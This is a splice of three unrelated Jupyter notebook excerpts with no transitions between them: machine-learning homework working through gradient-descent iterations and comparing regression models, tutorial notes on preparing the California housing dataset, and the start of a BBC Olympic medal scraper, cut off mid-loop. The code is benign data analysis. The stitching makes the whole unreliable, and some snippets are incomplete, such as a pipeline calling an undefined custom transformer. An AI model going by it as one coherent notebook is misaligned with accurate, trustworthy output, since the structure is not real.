$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w})}{N}=326.3125
$$
The new $w$ and output $a$ are:
$$w=10-326.3125=-316.3125\\
a=[-1576.562, -3158.125, -4739.688, -6321.25, -7902.812, -9484.375, -3158.125, -4739.688]
$$
**For the 2nd iteration,** similar steps to the 1st iteration have been carried out.
The sum of gradients for the batch update is:
$$\sum_{i}(\frac{\partial E}{\partial w})=-822307.5
$$
Averaging over $N=8$ and multiplying by the learning rate (0.1) gives the step size:
$$s_2=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w})}{N}=-10278.844
$$
The new $w$ and output $a$ are:
$$w=-316.3125-(-10278.844)=9962.531\\
a=[49817.656, 99630.312, 149442.969, 199255.625, 249068.281, 298880.938, 99630.312, 149442.969]
$$
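As in Q4, the hand arithmetic for the 8-point batch can be verified numerically:

```python
import numpy as np

p = np.array([1, 2, 3, 4, 5, 6, 2, 3], dtype=float)
T = np.array([1, 2, 3, 4, 5, 6, 3, 4], dtype=float)
w, lr = 10.0, 0.1

for it in (1, 2):
    grad = (5 * (w * p + 1) - T) * 5 * p   # per-sample dE/dw
    print(f"iteration {it}: sum = {grad.sum():.1f}, step = {lr * grad.mean():.4f}")
    w -= lr * grad.mean()
print("w after two iterations:", w)
```

This prints the gradient sums 26105 and −822307.5 and ends at $w=9962.53125$, matching the values above.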
#### Code
Similar to Q4, **over the first 2 iterations the updated output $a$ moves farther and farther from the actual values, because the learning rate of 0.1 is too large: the weight oscillates and the algorithm cannot converge.** Q7 explores a proper learning rate for this case.
From the code below, the loss keeps growing over 30 iterations and never converges, which confirms this finding.
```
w, a, gradient = single_layer_NN(lr=0.1, w=10, maxiteration=30)
```
### Two-layer NN
#### First two iterations illustration
The first two iterations are essentially the same as in Q5.
**For the 1st iteration**,
$$
For\quad i=1, 2, \ldots, 8, \quad a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1\\
$$
For $i=1:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-1=10\\
\frac{\partial E}{\partial w_2}=10*1*1=10,\quad \frac{\partial E}{\partial w_1}=10*10*(1-1)*1=0
$$
For $i=2:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-2=9\\
\frac{\partial E}{\partial w_2}=9*1*1=9,\quad \frac{\partial E}{\partial w_1}=9*10*(1-1)*1=0
$$
For $i=3:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\
\frac{\partial E}{\partial w_2}=8*1*1=8,\quad \frac{\partial E}{\partial w_1}=8*10*(1-1)*1=0
$$
For $i=4:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\
\frac{\partial E}{\partial w_2}=7*1*1=7,\quad \frac{\partial E}{\partial w_1}=7*10*(1-1)*1=0
$$
For $i=5:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-5=6\\
\frac{\partial E}{\partial w_2}=6*1*1=6,\quad \frac{\partial E}{\partial w_1}=6*10*(1-1)*1=0
$$
For $i=6:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-6=5\\
\frac{\partial E}{\partial w_2}=5*1*1=5,\quad \frac{\partial E}{\partial w_1}=5*10*(1-1)*1=0
$$
For $i=7:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\
\frac{\partial E}{\partial w_2}=8*1*1=8,\quad \frac{\partial E}{\partial w_1}=8*10*(1-1)*2=0
$$
For $i=8:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\
\frac{\partial E}{\partial w_2}=7*1*1=7,\quad \frac{\partial E}{\partial w_1}=7*10*(1-1)*3=0
$$
The sums of gradients for the batch update are:
$$\sum_{i}(\frac{\partial E}{\partial w_1})=0$$
$$\sum_{i}(\frac{\partial E}{\partial w_2})=10+9+8+7+6+5+8+7=60$$
Averaging over $N=8$ and multiplying by the learning rate (0.1) gives the step sizes:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_1})}{N}=0$$
$$s_2=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_2})}{N}=0.75$$
The new weights $w_1$, $w_2$ and outputs $a_1$, $a_2$ are calculated below; the values of $a_1$ and $a_2$ are the same for all 8 observations.
$$
w_1=w_1-s_1=10-0=10,\\
w_2=w_2-s_2=10-0.75=9.25\\
a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1, \quad i\in [1,2,\ldots,8]\\
a_2=w_2a_1+b=9.25*1+1=10.25
$$
**For the 2nd iteration**, similar steps to the 1st iteration give:
The sums of gradients for the batch update are:
$$\sum_{i}(\frac{\partial E}{\partial w_1})=0$$
$$\sum_{i}(\frac{\partial E}{\partial w_2})=54$$
Averaging over $N=8$ and multiplying by the learning rate (0.1) gives the step sizes:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_1})}{N}=0$$
$$s_2=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_2})}{N}=0.675$$
The new weights $w_1$, $w_2$ and outputs $a_1$, $a_2$ are calculated below; the values of $a_1$ and $a_2$ are the same for all 8 observations:
$$
w_1=w_1-s_1=10-0=10,\\
w_2=w_2-s_2=9.25-0.675=8.575\\
a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1, \quad i\in [1,2,\ldots,8]\\
a_2=w_2a_1+b=8.575*1+1=9.575
$$
#### Code
Below is the code to estimate all weights using batch training, with the stopping criterion being a change in the loss function of less than 0.0001. The iterations stop at Iteration 62, with $w_1=10$ and $w_2=2.51$; $w_1$ hardly changes throughout. The output of the first 60 iterations is suppressed to keep the report concise.
Notably, compared with Q5 the fitted $w_1$ and $w_2$ are almost the same even though two more points were added to the training set. A plot is also given to show how well the 2-layer NN model fits the 8 sample data points; as can be seen, the fit is poor.
```
w1, w2, a1, a2, gradient_1, gradient_2 = linear_activation_NN(C=1, lr=0.1, w1=10, w2=10, maxiteration=100)
# plot the fit
x = np.linspace(-4, 10, 100)
y = w2 * (1 / (1 + np.exp(-(w1 * x + 1)))) + 1
# plt.close('all')
plt.plot(x, y, c='red', label='y = f(w2 * a1 + b)')
plt.title('Fitted line using two-layer NN')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.xlim((-5, 8))
plt.ylim((-2, 8))
plt.xlabel('x')
plt.ylabel('y')
plt.show()
```
## Q7 Discussion
Detailed comments for Q1, Q2, Q3, Q5 and Q6 have been made in each section respectively. Here the convergence issue of the single-layer NN in Q4 and Q6 is discussed.
### Discussion of Convergence Issue
As mentioned in Q4, over the first 2 iterations the updated output $a$ moves farther and farther from the actual values, and after 30 iterations of the code the loss keeps growing without converging. The cause is the learning rate of 0.1, which is too large and makes the weight oscillate rather than converge. Below, the learning rate is reduced to 0.001 and the algorithm converges after 23 iterations with a loss value of `14.423`.
The fit has been plotted against the sample data points.
```
ar = np.array([[1, 1, 1, 1, 1, 1], # intercept
[1, 2, 3, 4, 5, 6], # x
[1, 2, 3, 4, 5, 6]]) # y
# Data preprocessing
X_lp = ar[[0, 1], :].T # transpose the array before modeling
y_lp = ar[2].T
# Learning rate has been adjusted to 0.001
w, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=100)
# plot the fit
x = np.linspace(0, 10, 100)
y = 5 * w * x + 5
plt.close('all')
plt.plot(x, y, c='red', label='y = f(wx + b)')
plt.title('Fitted line using single-layer NN')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.show()
```
The same experiment has been applied to the convergence issue in Q6 (single-layer NN). As mentioned in Q6, with a learning rate of 0.1 the updated output $a$ moves farther and farther from the actual values, and the loss keeps growing without converging. Below, the learning rate is reduced to 0.001 and the algorithm converges after 26 iterations with a loss value of `15.880`.
The fit has been plotted against the sample data points.
```
ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1], # intercept
[1, 2, 3, 4, 5, 6, 2, 3], # x
[1, 2, 3, 4, 5, 6, 3, 4]]) # y
# Data preprocessing
X_lp = ar[[0, 1], :].T # transpose the array before modeling
y_lp = ar[2].T
# Learning rate has been adjusted to 0.001
w, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=100)
# plot the fit
x = np.linspace(0, 10, 100)
y = 5 * w * x + 5
plt.close('all')
plt.plot(x, y, c='red', label='y = f(wx + b)')
plt.title('Fitted line using single-layer NN')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.show()
```
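The learning-rate effect described above can be reproduced on a stripped-down version of the problem. The function below is a minimal sketch of my own (not the notebook's `single_layer_NN`): plain gradient descent for the model $\hat{y} = 5wx$ on the six sample points, run with both learning rates.

```python
# Minimal sketch (toy reimplementation, not the notebook's single_layer_NN):
# gradient descent on one weight, showing that lr=0.1 diverges while
# lr=0.001 converges on these data.
import numpy as np

def final_loss(lr, w=10.0, steps=30):
    x = np.array([1., 2., 3., 4., 5., 6.])
    y = np.array([1., 2., 3., 4., 5., 6.])
    for _ in range(steps):
        grad = np.mean((5 * w * x - y) * 5 * x)  # d/dw of mean 0.5*(5wx - y)^2
        w -= lr * grad
    return 0.5 * np.mean((5 * w * x - y) ** 2)

print(final_loss(lr=0.1))    # large step: loss blows up
print(final_loss(lr=0.001))  # small step: loss shrinks toward zero
```

Each update multiplies the error in $w$ by roughly $1 - 25\,\mathrm{lr}\,\overline{x^2}$; with lr = 0.1 the magnitude of that factor is far above 1, so the iterates oscillate with growing amplitude, while lr = 0.001 keeps it below 1 and the iterates contract.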
## Q8 Bonus Question
I add two points, (2,1) and (3,2), aiming to balance out the effect of the two additional points added in Q6.
**All four models (Simple Linear Regression, Fuzzy Linear Regression, Support Vector Regression and Single-layer NN) lead to the same fitted line and give the same predictions for x = 1, 2, 3, 4, 5, and 6: y = 1, 2, 3, 4, 5, and 6 respectively.**
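As a quick numeric sanity check (not part of the original notebook): the common fitted line is $y = ax + b$ with $a = 1$ and $b = 0$, so the predictions follow directly.

```python
# Predictions of the shared fitted line y = 1*x + 0 at x = 1..6
a, b = 1, 0
preds = [a * x + b for x in range(1, 7)]
print(preds)  # [1, 2, 3, 4, 5, 6]
```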
The training observations look like the graph below.
```
ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1], # intercept
[1, 2, 3, 4, 5, 6, 2, 3, 2, 3], # x
[1, 2, 3, 4, 5, 6, 3, 4, 1, 2]]) # y
# plot the dot points
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.title('Visualization of training observations')
plt.axis('scaled')
plt.show()
X_lp = ar[[0, 1], :].T # transpose the array before modeling
y_lp = ar[2].T
```
### Simple Linear Regression
For Simple Linear Regression, the same model from Q1 is used. The estimated $a$ is 1 and $b$ is 0:
```
# Define and solve the CVXPY problem.
beta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total
cost = cp.sum_squares(X_lp * beta - y_lp) # define cost function
obj = cp.Minimize(cost) # define objective function
prob = cp.Problem(obj)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe estimated of a (slope) is:", beta.value[1],
"\nThe estimate of b (intercept) is:", beta.value[0])
# Plot the fit
x = np.linspace(0, 10, 100)
y = beta.value[1] * x + beta.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = ax + b')
plt.title('Fitted line using simple LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
### Fuzzy Linear Regression
For Fuzzy Linear Regression, the same model from Q6 is used. The estimates are $A_0=0$ with spread 2 and $A_1=1$ with spread 0.
```
# Define threshold h (it has same meaning as the alpha in alpha-cut). Higher the h, wider the spread.
h = 0.5
# Define and solve the CVXPY problem.
c = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1
alpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1
cost = cp.sum(X_lp * c) # define cost function
obj = cp.Minimize(cost) # define objective function
constraints = [c >= 0,
y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp
-y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe center of A1 (slope) is:", alpha.value[1],
"\nThe spread of A1 (slope) is:", c.value[1],
"\nThe center of A0 (intercept) is:", alpha.value[0],
"\nThe spread of A0 (intercept) is:", c.value[0])
# Plot the FR fit
x = np.linspace(0, 10, 100)
y = alpha.value[1] * x + alpha.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = A1x + A0')
y = (alpha.value[1] + c.value[1]) * x + alpha.value[0] + c.value[0]
plt.plot(x, y, '--g', label='Fuzzy Spread')
y = (alpha.value[1] - c.value[1]) * x + alpha.value[0] - c.value[0]
plt.plot(x, y, '--g')
plt.title('Fitted line using Fuzzy LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
### Support Vector Regression
For Support Vector Regression, the same model from Q6 is used, with $\epsilon$ set to 1. The estimated $w$ is 1 and $b$ is 0.
```
epsilon = 1
bw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w
cost = 1 / 2 * bw[1] ** 2
obj = cp.Minimize(cost)
constraints = [
y_lp <= X_lp * bw + epsilon,
-y_lp <= -(X_lp * bw) + epsilon]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nSVR result:")
print("The estimate of w is:", bw.value[1],
"\nThe estimate of b is:", bw.value[0], )
# Plot the SVR fit
upper = X_lp[:, 1] * bw.value[1] + bw.value[0] + epsilon # upper bound of the margin
lower = X_lp[:, 1] * bw.value[1] + bw.value[0] - epsilon # lower bound of the margin
x = np.linspace(.5, 6, 100)
y = bw.value[1] * x + bw.value[0]
plt.plot(x, y, c='red', label='y = wx + b')
x = [[min(X_lp[:, 1]), max(X_lp[:, 1])]]
y = [[min(lower), max(lower)]]
for i in range(len(x)):
plt.plot(x[i], y[i], '--g')
y = [[min(upper), max(upper)]]
for i in range(len(x)):
plt.plot(x[i], y[i], '--g', label='margin')
plt.title('Fitted line using SVR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
### Single-layer NN
For the single-layer NN, I use the same structure as in Q4 ***with the bias set to 0***. As discussed in Q7, I set the learning rate to 0.001; the algorithm converges at iteration 30 with an estimated $w$ of 0.2. The fitted line is plotted together with the training sample points.
```
def single_layer_NN(lr, w, maxiteration, bias=1):
"""lr - learning rate\n
w - initial value of w\n
maxiteration - define # of max iteration\n
bias - default is 1 """
E0 = sum(0.5 * np.power((y_lp - 5 * (w * X_lp[:, 1] + bias)), 2)) # initialize Loss, before 1st iteration
for i in range(maxiteration):
if i > 0: # Starting 2nd iteration, E1 value give to E0
E0 = E1 # Loss before iteration
print("Iteration=", i, ",", "Loss value=", E0)
gradient = np.mean((5 * (w * X_lp[:, 1] + bias) - y_lp) * 5 * X_lp[:, 1]) # calculate gradient
step = gradient * lr # calculate step size
w = w - step # refresh the weight
E1 = sum(0.5 * np.power((5 * (w * X_lp[:, 1] + bias) - y_lp), 2)) # Loss after iteration
a = 5 * (w * X_lp[:, 1] + 1) # the refreshed output
if abs(E0 - E1) <= 0.0001:
print('Break out of the loop and end at Iteration=', i,
'\nThe value of loss is:', E1,
'\nThe value of w is:', w)
break
return w, a, gradient
w, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=40, bias=0)
# plot the NN fit
x = np.linspace(0, 10, 100)
y = 5 * w * x + 0
plt.close('all')
plt.plot(x, y, c='red', label='y = f(wx + b)')
plt.title('Fitted line using single-layer NN')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
```
# fetching data online
import os
import tarfile
from six.moves import urllib
DOWNLOAD_ROOT = "https://raw.githubusercontent.com/ageron/handson-ml2/master/"
HOUSING_PATH = os.path.join("datasets", "housing")
HOUSING_URL = DOWNLOAD_ROOT + "datasets/housing/housing.tgz"
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
if not os.path.isdir(housing_path):
os.makedirs(housing_path)
tgz_path = os.path.join(housing_path, "housing.tgz")
urllib.request.urlretrieve(housing_url, tgz_path)
housing_tgz = tarfile.open(tgz_path)
housing_tgz.extractall(path=housing_path)
housing_tgz.close()
fetch_housing_data()
import pandas as pd
def load_housing_data(housing_path=HOUSING_PATH):
csv_path = os.path.join(housing_path, "housing.csv")
return pd.read_csv(csv_path)
housing = load_housing_data()
housing.head()
housing.info()
housing["ocean_proximity"].value_counts()
housing.describe()
%matplotlib inline
import matplotlib.pyplot as plt
housing.hist(bins=50, figsize=(20,15))
plt.show()
import numpy as np
def split_train_test (data, test_ratio):
shuffled_indices = np.random.permutation(len(data))
test_set_size = int(len(data) * test_ratio)
test_indices = shuffled_indices[:test_set_size]
train_indices = shuffled_indices[test_set_size:]
return data.iloc[train_indices], data.iloc[test_indices]
train_set, test_set = split_train_test(housing, 0.2)
print(len(train_set))
print(len(test_set))
from zlib import crc32
def test_set_check(identifier, test_ratio):
return crc32(np.int64(identifier)) & 0xffffffff < test_ratio * 2**32
def split_train_test_by_id(data, test_ratio, id_column):
ids = data[id_column]
in_test_set = ids.apply(lambda id_: test_set_check(id_, test_ratio))
return data.loc[~in_test_set], data.loc[in_test_set]
housing_with_id = housing.reset_index() # adds an `index` column
train_set, test_set = split_train_test_by_id(housing_with_id, 0.2, "index")
housing_with_id["id"] = housing["longitude"] * 1000 + housing["latitude"]
train_set, test_set = split_train_test_by_id(housing_with_id, 0.2, "id")
# splitting using scikit-learn
from sklearn.model_selection import train_test_split
train_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)
housing["income_cat"] = pd.cut(housing["median_income"],
bins=[0., 1.5, 3.0, 4.5, 6., np.inf],
labels=[1, 2, 3, 4, 5])
housing['income_cat'].hist()
plt.show()
# stratified splitting
from sklearn.model_selection import StratifiedShuffleSplit
split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)
for train_index, test_index in split.split(housing, housing["income_cat"]):
strat_train_set = housing.loc[train_index]
strat_test_set = housing.loc[test_index]
strat_test_set["income_cat"].value_counts() / len(strat_test_set)
for set_ in (strat_train_set, strat_test_set):
set_.drop("income_cat", axis=1, inplace=True)
housing = strat_train_set.copy()
housing.plot(kind="scatter", alpha =0.1, x="longitude", y="latitude")
plt.show()
corr_matrix = housing.corr()
corr_matrix
corr_matrix['median_house_value'].sort_values(ascending=False)
plt.subplot()
plt.plot(corr_matrix['median_house_value'], color ='red')
plt.show()
#using pandas's scatter matrix to check for correlation
from pandas.plotting import scatter_matrix
attributes = ["median_house_value", "median_income", "total_rooms", "housing_median_age"]
scatter_matrix(housing[attributes], figsize=(12,8))
plt.show()
housing.plot(kind='scatter', x='median_income', y="median_house_value", alpha=0.1)
plt.show()
housing["rooms_per_household"] = housing["total_rooms"] / housing["households"]
housing["population_per_household"] = housing["population"] / housing["households"]
housing["bedrooms_per_room"] = housing["total_bedrooms"] / housing["total_rooms"]
corr_matrix = housing.corr()
corr_matrix["median_house_value"].sort_values(ascending = False)
#Prepare the Data for Machine Learning Algorithms
housing = strat_train_set.drop("median_house_value", axis=1)
housing_labels = strat_train_set["median_house_value"].copy()
median = housing["total_bedrooms"].median()
```
## Data Cleaning
Most Machine Learning algorithms cannot work with missing features, so let's create a few functions to take care of them. You noticed earlier that the total_bedrooms attribute has some missing values, so let's fix this. You have three options:
- Get rid of the corresponding districts.
- Get rid of the whole attribute.
- Set the values to some value (zero, the mean, the median, etc.).

You can accomplish these easily using DataFrame's dropna(), drop(), and fillna() methods.

If you choose option 3, you should compute the median value on the training set and use it to fill the missing values in the training set. Also save the median value you computed: you will need it later to replace missing values in the test set when you evaluate your system, and again once the system goes live, to replace missing values in new data.

Scikit-Learn provides a handy class to take care of missing values: SimpleImputer. To use it, first create a SimpleImputer instance, specifying that you want to replace each attribute's missing values with the median of that attribute.

For now I won't go deeper into sklearn, since we are yet to treat the library.
```
housing.dropna(subset=["total_bedrooms"]) # option 1
housing.drop("total_bedrooms", axis=1) # option 2
median = housing["total_bedrooms"].median() # option 3
housing["total_bedrooms"].fillna(median, inplace=True)
from sklearn.impute import SimpleImputer
imputer = SimpleImputer(strategy="median")
# Note: the class is SimpleImputer; SimplerImputer (my earlier typo) raises a NameError
#Since the median can only be computed on numerical attributes, we need to create a
#copy of the data without the text attribute ocean_proximity:
housing_num = housing.drop("ocean_proximity", axis=1)
print(imputer.fit(housing_num))
imputer
# I could have imputed only the total_bedrooms attribute, which has the missing values,
# but we can't be sure about tomorrow's data, so let's apply it everywhere
imputer.statistics_
housing_num.median().values
#transform the values
X = imputer.transform(housing_num)
housing_tr = pd.DataFrame(X, columns=housing_num.columns)
housing_tr
# fit() and transform() vs fit_transform():
# fit_transform() fits and then transforms in one call, and sometimes runs faster.
```
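The train-then-reuse rule stated above (compute the median on the training set, save it, and apply it to test and future data) can be sketched with plain numpy. The arrays below are made-up toy values, not the housing data.

```python
# Toy sketch: median imputation computed on the training column only,
# then reused for the test set and any new data.
import numpy as np

train_col = np.array([2.0, 4.0, np.nan, 8.0])
test_col = np.array([np.nan, 10.0])

median = np.nanmedian(train_col)  # computed on the training set only
train_filled = np.where(np.isnan(train_col), median, train_col)
test_filled = np.where(np.isnan(test_col), median, test_col)  # reuse the saved value

print(median)       # 4.0
print(test_filled)  # [ 4. 10.]
```

This is exactly what SimpleImputer does internally: `fit` stores the training medians in `statistics_`, and `transform` reuses them on any array it is given.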
## Handling Text and Categorical Attributes
```
# let's treat the ocean_proximity attribute
housing_cat = housing[["ocean_proximity"]]
housing_cat.head(15)
#check for the value counts
housing_cat.value_counts(sort=True)
```
# To convert a text attribute to numbers (ML algorithms tend to work better with numbers), we can use
- one-hot encoding
- Scikit-Learn's OrdinalEncoder class
- etc
```
from sklearn.preprocessing import OrdinalEncoder
ordinal_encoder = OrdinalEncoder()
ordinal_encoder
housing_cat_encoded = ordinal_encoder.fit_transform(housing_cat)
housing_cat_encoded
ordinal_encoder.categories_
_  # in a REPL or notebook, _ holds the value of the last expression
```
## Underscore (_) in Python
Following are different places where `_` is used in Python:

Single underscore:
- in the interpreter
- after a name
- before a name

Double underscore:
- `__leading_double_underscore`
- `__before_and_after__`

**In the interpreter:** `_` returns the value of the last executed expression in the Python prompt/interpreter.

**For ignoring values:** often we don't need a return value; assigning it to `_` marks it as a throwaway variable.

```
# Ignore the loop variable
for _ in range(10):
    print("Test")
# Ignore values when unpacking
a, b, _, _ = my_method(var1)
```

**After a name:** Python has reserved keywords that cannot be used as variable names. To avoid a conflict between a Python keyword and a variable, add an underscore after the name (e.g. `class_`).
- snake_case vs camelCase vs PascalCase
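The underscore idioms above can be run end-to-end as follows; since `my_method` from the snippet is never defined, it is replaced here by a concrete tuple for illustration.

```python
# Self-contained versions of the underscore idioms described above.

# Throwaway loop variable
count = 0
for _ in range(10):
    count += 1

# Ignoring values when unpacking
a, b, _, _ = (1, 2, 3, 4)

# Trailing underscore to avoid shadowing the `class` keyword
class_ = "Geometry"

print(count, a, b, class_)  # 10 1 2 Geometry
```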
```
# One-hot encoding
# With the ordinal codes above (0., 1., ..., 4.), an ML algorithm will assume that
# two nearby values (e.g. 0 and 1) are more similar than two distant ones, which is
# wrong for ocean_proximity. To fix this we use dummy variables; scikit-learn
# provides OneHotEncoder for this.
from sklearn.preprocessing import OneHotEncoder
cat_encoder = OneHotEncoder()
housing_cat_1hot = cat_encoder.fit_transform(housing_cat)
housing_cat_1hot
# Using up tons of memory mostly to store zeros would be very wasteful, so
# instead a sparse matrix only stores the location of the nonzero elements.
# You can use it mostly like a normal 2D array, but if you really want to
# convert it to a (dense) NumPy array, just call the toarray() method:
housing_cat_1hot.toarray()
```
# Feature Scaling
One of the most important transformations you need to apply to your data is feature scaling. With few exceptions, Machine Learning algorithms don't perform well when the input numerical attributes have very different scales. This is the case for the housing data: the total number of rooms ranges from about 6 to 39,320, while the median incomes only range from 0 to 15. Note that scaling the target values is generally not required.

There are two common ways to get all attributes to have the same scale: min-max scaling and standardization.

Min-max scaling (many people call this normalization) is quite simple: values are shifted and rescaled so that they end up ranging from 0 to 1.
```
housing_cat
housing
housing.info()
housing["total_rooms"].value_counts().head(100)
housing["median_income"].value_counts().head(100)
```
## Feature scaling
### Types
- Min-Max / Normalization
- Standardization

**Min-Max scaling:** subtract the minimum from all values, then divide by the difference between the max and the min. The result is that our values will go from 0 to 1.

**Standardization** is quite different: first it subtracts the mean value (so standardized values always have a zero mean), and then it divides by the standard deviation so that the resulting distribution has unit variance. Unlike min-max scaling, standardization does not bound values to a specific range, which may be a problem for some algorithms (e.g., neural networks often expect an input value ranging from 0 to 1). However, standardization is much less affected by outliers. For example, suppose a district had a median income equal to 100 (by mistake). Min-max scaling would then crush all the other values from 0–15 down to 0–0.15, whereas standardization would not be much affected. Scikit-Learn provides a transformer called StandardScaler for standardization.
#### Scikit-Learn handling of feature scaling
Scikit-Learn provides a transformer called MinMaxScaler for this. It has a `feature_range` hyperparameter that lets you change the range if you don't want 0–1 for some reason.
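The two scalings described above amount to simple column-wise arithmetic. The sketch below uses plain numpy on made-up toy values (not the housing data); `MinMaxScaler` and `StandardScaler` perform the same computation per column.

```python
# Plain-numpy sketch of min-max scaling and standardization on one toy column.
import numpy as np

col = np.array([6.0, 100.0, 500.0, 39320.0])

# Min-max scaling: shift by the min, divide by the range -> values in [0, 1]
minmax = (col - col.min()) / (col.max() - col.min())

# Standardization: subtract the mean, divide by the std -> zero mean, unit variance
standard = (col - col.mean()) / col.std()

print(minmax.min(), minmax.max())  # 0.0 1.0
print(abs(standard.mean()) < 1e-9, abs(standard.std() - 1) < 1e-9)  # True True
```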
# Transformation Pipelines
```
# Note: CombinedAttributesAdder is a custom transformer (defined in the book's
# chapter, not in this notebook) that adds the rooms_per_household etc. columns.
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler

num_pipeline = Pipeline([
        ('imputer', SimpleImputer(strategy="median")),
        ('attribs_adder', CombinedAttributesAdder()),
        ('std_scaler', StandardScaler()),
    ])

from sklearn.compose import ColumnTransformer
housing_num
num_attribs = list(housing_num)
cat_attribs = ["ocean_proximity"]
full_pipeline = ColumnTransformer([
        ("num", num_pipeline, num_attribs),
        ("cat", OneHotEncoder(), cat_attribs),
    ])
housing_prepared = full_pipeline.fit_transform(housing)
```
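The pipeline above calls `CombinedAttributesAdder()`, a custom transformer from the book's chapter that this notebook never defines. Below is a minimal sketch consistent with the ratio columns computed earlier; the column indices are assumptions tied to the housing column order, and for full scikit-learn compatibility (cloning, grid search) you would also subclass `BaseEstimator` and `TransformerMixin`.

```python
import numpy as np

# Assumed column positions in the numeric array (they depend on the
# housing DataFrame's column order).
rooms_ix, bedrooms_ix, population_ix, households_ix = 3, 4, 5, 6

class CombinedAttributesAdder:
    """Adds the rooms_per_household, population_per_household and
    bedrooms_per_room ratio columns computed earlier in the notebook."""
    def __init__(self, add_bedrooms_per_room=True):
        self.add_bedrooms_per_room = add_bedrooms_per_room
    def fit(self, X, y=None):
        return self  # stateless: nothing to learn
    def transform(self, X):
        rooms_per_household = X[:, rooms_ix] / X[:, households_ix]
        population_per_household = X[:, population_ix] / X[:, households_ix]
        if self.add_bedrooms_per_room:
            bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]
            return np.c_[X, rooms_per_household,
                         population_per_household, bedrooms_per_room]
        return np.c_[X, rooms_per_household, population_per_household]

# Smoke test on one fake row with 9 numeric columns, as in housing_num
row = np.array([[0., 0., 0., 100., 20., 300., 50., 0., 0.]])
out = CombinedAttributesAdder().fit(row).transform(row)
print(out.shape)  # (1, 12): 9 original + 3 ratio columns
```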
# 2016 Olympics medal count acquisition
In this notebook, we acquire the current medal count from the web.
# 1. List of sports
```
from bs4 import BeautifulSoup
import urllib.request  # Python 3: urlopen lives in urllib.request
r = urllib.request.urlopen('http://www.bbc.com/sport/olympics/rio-2016/medals/sports').read()
soup = BeautifulSoup(r, "lxml")
sports_span = soup.findAll("span", {"class": "medals-table-by-sport__sport-name"})
sports_names = []
sports_names_format = []
for s in sports_span:
    sports_names_format.append(str(s))
    sports_names.append(str(s).lower().replace(" ", "-")[48:-7])
print(sports_names)
```
# 2. HTMLs for each sport's medal table
```
# Save html for each sport
import urllib.request
htmls = {}
for s in sports_names:
    htmls[s] = urllib.request.urlopen('http://www.bbc.com/sport/olympics/rio-2016/medals/sports/' + s + '#' + s).read()
# Find table html for each sport
thtmls = {}
for s in sports_names:
    soupsp = BeautifulSoup(htmls[s], "lxml")
    thtmls[s] = soupsp.findAll("table", {"class": "medals-table-by-sport__countries_table"})
```
# 3. Scrape medals for each country and sport
```
# For every sport, scrape medal data
import re
medal_names = ['gold', 'silver', 'bronze']
medals = {}
sports_countries = {}
all_countries_format = []
for s in sports_names:
    print(s)
    medals[s] = {}
    h = str(thtmls[s])
    if not thtmls[s]:
        print('no medals yet')
    else:
        # Find countries of interest
        pattern = r"<abbr class=\"abbr-on medium-abbr-off\" title=\""
        pmatch = re.finditer(pattern, h)
        countries = []
        for i, match in enumerate(pmatch):
